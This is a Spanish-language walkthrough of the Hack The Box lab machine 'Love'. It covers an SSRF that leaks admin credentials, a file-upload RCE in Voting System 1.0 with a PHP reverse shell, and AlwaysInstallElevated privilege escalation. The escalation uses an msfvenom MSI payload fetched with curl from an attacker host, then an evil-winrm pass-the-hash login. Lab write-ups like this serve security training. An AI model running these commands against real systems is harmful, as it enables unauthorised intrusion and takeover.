# Love

**OS**: Windows \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen
- Voting System 1.0 - File Upload RCE
- AlwaysInstallElevated priv esc

## Nmap Scan

`nmap -sV -sC -oN nmap.txt 10.10.10.239`

```
Nmap scan report for 10.10.10.239
Host is up (0.067s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeración

En el escaneo previo podemos ver un par de subdominios **www.love.htb** y **staging.love.htb**, los agregamos a nuestro archivo **host**.

##### /etc/hosts
```
10.10.10.239    www.love.htb love.htb staging.love.htb
```

Solo tenemos acceso al puerto 80, el puerto 443 y 5000 nos dan un error 403. Las siguientes capturas muestran el contenido de las páginas web.

![1](img/1.png)

![2](img/2.png)

Vemos que en **staging.love.htb** tenemos una funcionalidad que nos permite escanear un archivo proporcionando una URL.

![3](img/3.png)

Si consultamos la siguiente URL **http://127.0.0.1:5000** nos regresa credenciales.

![4](img/4.png)

```
admin : @LoveIsInTheAir!!!!
```

Utilizando gobuster encontramos que hay un directorio llamado **admin**.

`gobuster dir -u http://love.htb/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html`

![5](img/5.png)

![6](img/6.png)

Con las credenciales que se obtuvieron podemos acceder al portal.

![7](img/7.png)

### Voting System 1.0 - File Upload RCE

Investigando encontramos el siguiente [exploit](https://www.exploit-db.com/exploits/49445) que nos permite subir un archivo PHP y obtener una reverse shell. \
Llevaremos a cabo el proceso manualmente solo utilizando el siguiente [script](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php).

Solo modificamos nuestra IP en el script.

![8](img/8.png)

Antes de comenzar el ataque ponemos a la escucha nuestro netcat.

`rlwrap nc -lvnp 1234`

Ya con todo establecido comenzamos el ataque. Nos vamos al aparado de **Update** y subimos nuestro archivo PHP e introducimos el password para confirmar los cambios.

![9](img/9.png)

Una vez dando clic en el botón **save** obtendremos nuestra reverse shell.

![10](img/10.png)

## Escalada de Privilegios

Descargaremos **winPEAS** en el sistema para obtener información.

- `mkdir c:\temp`
- `cd c:\temp`
- `curl http://10.10.14.33/winPEASx64.exe -o c:\temp\winPEASx64.exe`

![11](img/11.png)

Después de ejecutar el programa nos percatamos que está habilitado el registro **AlwaysInstallElevated**.

![12](img/12.png)

Esto nos permitirá elevar privilegios en el sistema para eso creamos nuestra reverse shell y posteriormente la subiremos al servidor.

`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.33 LPORT=4444 -f msi -o doom.msi`

![13](img/13.png)

- `python3 -m http.server 80`
- `curl http://10.10.14.33/doom.msi -o c:\temp\doom.msi`

![14](img/14.png)

Ejecutamos el siguiente comando para obtener una reverse shell.

- `nc -lvnp 4444`
- `msiexec /quiet /qn /i doom.msi`

![15](img/15.png)

`evil-winrm -u administrator -H aab42ca009fed69fa5ee57c52cf5bcf1 -i love.htb`

## Referencias
https://www.exploit-db.com/exploits/49445 \
https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php \
https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/ \
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated